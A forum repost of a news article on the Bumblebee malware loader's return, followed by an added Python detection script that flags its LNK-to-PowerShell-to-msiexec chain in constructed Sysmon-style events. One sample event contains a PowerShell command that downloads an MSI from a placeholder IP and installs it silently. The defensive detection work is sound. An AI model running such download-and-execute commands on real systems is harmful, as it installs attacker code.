Bumblebee malware returns after recent law enforcement disruption

Gandalf_The_Grey

The Bumblebee malware loader has been spotted in new attacks recently, more than four months after Europol disrupted it during 'Operation Endgame' in May.

Believed to be the creation of TrickBot developers, the malware emerged in 2022 as a replacement for the BazarLoader backdoor to provide ransomware threat actors access to victim networks.

Bumblebee typically achieves infection via phishing, malvertising, and SEO poisoning that promoted various software (e.g. Zoom, Cisco AnyConnect, ChatGPT, and Citrix Workspace).

Among the payloads typically delivered by Bumblebee are Cobalt Strike beacons, information-stealing malware, and various ransomware strains.

In May, an international law enforcement operation codenamed 'Operation Endgame' seized over a hundred servers supporting multiple malware loader operations, including IcedID, Pikabot, Trickbot, Bumblebee, Smokeloader, and SystemBC.

Since then, Bumblebee had been silent. However, researchers at cybersecurity company Netskope observed new Bumblebee activity tied to the malware, which could indicate a resurgence.

The most recent Bumblebee attack chain starts with a phishing email that lures the victim to download a malicious ZIP archive.

The compressed file contains a .LNK shortcut named Report-41952.lnk, which triggers PowerShell to download a malicious .MSI file (y.msi) disguised as a legitimate NVIDIA driver update or Midjourney installer from a remote server.

The MSI file is then executed silently using msiexec.exe with the /qn option, which ensures that the process runs without any user interaction.

To avoid spawning new processes, which is noisier, the malware uses the SelfReg table within the MSI structure, which instructs msiexec.exe to load the DLL into its own address space and to invoke its DllRegisterServer function.

Once the DLL is loaded and executed, the malware's unpacking process begins, leading to the deployment of Bumblebee in memory.
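Detection logic for the chain described in the post, written here as an added example (not code from the article, Netskope, or MalwareTips): three rules run over constructed Sysmon-style process-creation and image-load events, and the third rule shows why the SelfReg step needs image-load telemetry, since no child process is spawned. All paths, file names, field names and the 203.0.113.10 address are assumptions.

```python
import re

# Constructed Sysmon-style telemetry (process creation and image load), not real captures;
# paths, file names and the 203.0.113.10 documentation-range address are placeholders.
SAMPLE_EVENTS = [
    {"type": "process", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r'powershell -w hidden -c "iwr http://203.0.113.10/y.msi -OutFile $env:TEMP\y.msi; msiexec /i $env:TEMP\y.msi /qn"'},
    {"type": "process", "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmd": r"msiexec /i C:\Users\bob\AppData\Local\Temp\y.msi /qn"},
    # SelfReg stage: no child process, only a DLL mapped into msiexec.exe itself
    {"type": "imageload", "image": r"C:\Windows\System32\msiexec.exe",
     "loaded": r"C:\Users\bob\AppData\Local\Temp\MSI7F2A.tmp\w.dll", "signed": False},
    # Benign: managed deployment of a package, and msiexec loading its own system DLL
    {"type": "process", "parent": r"C:\Windows\System32\services.exe",
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmd": r"msiexec /i C:\Windows\ccmcache\a1\setup.msi /qn"},
    {"type": "imageload", "image": r"C:\Windows\System32\msiexec.exe",
     "loaded": r"C:\Windows\System32\msi.dll", "signed": True},
]

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
USER_WRITABLE = re.compile(r"\\(Temp|Downloads|AppData|Public)\\", re.I)
URL = re.compile(r"https?://", re.I)
SILENT = re.compile(r"\s/(q|qn|quiet)\b", re.I)  # msiexec UI-suppression switches

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def detect(events):
    """Return (rule_name, event_index) pairs for the LNK -> PowerShell -> msiexec -> DLL chain."""
    hits = []
    for i, ev in enumerate(events):
        img = basename(ev["image"])
        if ev["type"] == "process":
            cmd, parent = ev["cmd"], basename(ev["parent"])
            # Stage 1: Explorer (LNK double-click) starts PowerShell that fetches an .msi from a URL
            if img in ("powershell.exe", "pwsh.exe") and parent == "explorer.exe" \
                    and URL.search(cmd) and ".msi" in cmd.lower():
                hits.append(("lnk_powershell_msi_download", i))
            # Stage 2: silent msiexec started by a script host, or given a user-writable/remote package
            if img == "msiexec.exe" and SILENT.search(cmd) and \
                    (parent in SCRIPT_HOSTS or USER_WRITABLE.search(cmd) or URL.search(cmd)):
                hits.append(("silent_msi_from_script_or_user_path", i))
        # Stage 3: SelfReg/DllRegisterServer runs inside msiexec, so only image-load telemetry sees it
        elif ev["type"] == "imageload" and img == "msiexec.exe" \
                and not ev["signed"] and USER_WRITABLE.search(ev["loaded"]):
            hits.append(("msiexec_loads_unsigned_dll_from_user_path", i))
    return hits
```

The two benign events at the end (a service-driven deployment and msiexec loading a signed system DLL) produce no hits, which is the false-positive check a rule like stage 2 needs before it is deployed.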